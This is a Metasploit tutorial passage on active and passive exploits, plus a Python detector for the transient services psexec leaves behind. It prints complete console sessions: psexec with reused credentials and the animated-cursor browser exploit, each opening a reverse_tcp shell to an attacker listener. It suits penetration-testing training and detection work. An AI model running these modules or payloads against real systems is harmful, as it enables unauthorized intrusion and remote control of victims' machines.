
1. Active Exploits
Active exploits will exploit a specific host, run until completion, and then exit.
- Module execution stops if an error is encountered.
- Brute-force modules will exit when a shell opens from the victim.
- You can force an active module to the background by passing '-j' to the exploit command:
msf exploit(ms08_067_netapi) > exploit -j
[*] Exploit running as background job.
msf exploit(ms08_067_netapi) >
Example:
The following example makes use of a previously acquired set of credentials to exploit and gain a reverse shell on the target system.
msf exploit(psexec) > set RHOST 192.168.1.100
RHOST => 192.168.1.100
msf exploit(psexec) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(psexec) > set LHOST 192.168.1.5
LHOST => 192.168.1.5
msf exploit(psexec) > set LPORT 4444
LPORT => 4444
msf exploit(psexec) > set SMBUSER victim
SMBUSER => victim
msf exploit(psexec) > set SMBPASS s3cr3t
SMBPASS => s3cr3t
msf exploit(psexec) > exploit
[*] Connecting to the server...
[*] Started reverse handler
[*] Authenticating as user 'victim'...
[*] Uploading payload...
[*] Created \hikmEeEM.exe...
[*] Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.100[\svcctl] ...
[*] Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.1.100[\svcctl] ...
[*] Obtaining a service manager handle...
[*] Creating a new service (ciWyCVEp - "MXAVZsCqfRtZwScLdexnD")...
[*] Closing service handle...
[*] Opening service...
[*] Starting the service...
[*] Removing the service...
[*] Closing service handle...
[*] Deleting \hikmEeEM.exe...
[*] Sending stage (240 bytes)
[*] Command shell session 1 opened (192.168.1.5:4444 -> 192.168.1.100:1073)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>
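The transcript above shows the footprint this module leaves on the target: a randomly named executable is written, and a randomly named service is created, started and removed within seconds. The Python below is an added example (not from the original page or from Metasploit) that flags that pattern in service telemetry; the normalized record format, host names, paths, the name heuristic and the 30-second window are all assumptions.

```python
import re
from datetime import datetime

# Constructed, normalized telemetry (not real logs):
# timestamp host action service binary-path
# The first service/binary names are taken from the transcript; paths are constructed.
SAMPLE = """\
2024-05-01T10:00:01 WS01 service_install ciWyCVEp C:\\WINDOWS\\hikmEeEM.exe
2024-05-01T10:00:03 WS01 service_delete ciWyCVEp -
2024-05-01T10:05:00 WS01 service_install Spooler2 C:\\WINDOWS\\system32\\spoolsv.exe
2024-05-01T11:00:00 WS02 service_install BackupAgent C:\\Program Files\\Backup\\agent.exe
2024-05-01T11:00:02 WS02 service_delete BackupAgent -
"""

def looks_random(name):
    """Heuristic (assumption): 8+ letters only, mixed case, as in the transcript."""
    stem = name.rsplit("\\", 1)[-1].rsplit(".", 1)[0]
    if not re.fullmatch(r"[A-Za-z]{8,}", stem):
        return False
    return not stem.islower() and not stem.isupper()

def find_transient_services(log_text, max_lifetime=30):
    """Return services installed and deleted within max_lifetime seconds
    whose service name and binary name both look randomly generated."""
    installs, hits = {}, []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, host, action, service, binary = line.split(None, 4)
        when = datetime.fromisoformat(ts)
        key = (host, service)
        if action == "service_install":
            installs[key] = (when, binary)
        elif action == "service_delete" and key in installs:
            created, image = installs.pop(key)
            lifetime = (when - created).total_seconds()
            # A short lifetime alone also matches legitimate installers
            # (WS02 above), so both name checks must agree as well.
            if lifetime <= max_lifetime and looks_random(service) and looks_random(image):
                hits.append({"host": host, "service": service,
                             "image": image, "lifetime_s": lifetime})
    return hits

if __name__ == "__main__":
    for hit in find_transient_services(SAMPLE):
        print(hit)
```

The short-lived BackupAgent service on WS02 is not reported because its binary name fails the name check, which shows why lifetime alone is too noisy a signal.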
2. Passive Exploits
Passive exploits wait for incoming hosts and exploit them as they connect.
msf exploit(ani_loadimage_chunksize) > sessions -l

Active sessions
===============

  Id  Description  Tunnel
  --  -----------  ------
  1   Meterpreter  192.168.1.5:52647 -> 192.168.1.100:4444

msf exploit(ani_loadimage_chunksize) > sessions -i 1
[*] Starting interaction with 1...

meterpreter >
Example:
The following output shows the setup to exploit the animated cursor vulnerability. The exploit does not fire until a victim browses to our malicious website.
msf > use exploit/windows/browser/ani_loadimage_chunksize
msf exploit(ani_loadimage_chunksize) > set URIPATH /
URIPATH => /
msf exploit(ani_loadimage_chunksize) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(ani_loadimage_chunksize) > set LHOST 192.168.1.5
LHOST => 192.168.1.5
msf exploit(ani_loadimage_chunksize) > set LPORT 4444
LPORT => 4444
msf exploit(ani_loadimage_chunksize) > exploit
[*] Exploit running as background job.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://192.168.1.5:8080/
[*] Server started.
msf exploit(ani_loadimage_chunksize) >
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending HTML page to 192.168.1.100:1077...
[*] Attempting to exploit ani_loadimage_chunksize
[*] Sending Windows ANI LoadAniIcon() Chunk Size Stack Overflow (HTTP) to 192.168.1.100:1077...
[*] Sending stage (240 bytes)
[*] Command shell session 2 opened (192.168.1.5:4444 -> 192.168.1.100:1078)

msf exploit(ani_loadimage_chunksize) > sessions -i 2
[*] Starting interaction with 2...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\victim\Desktop>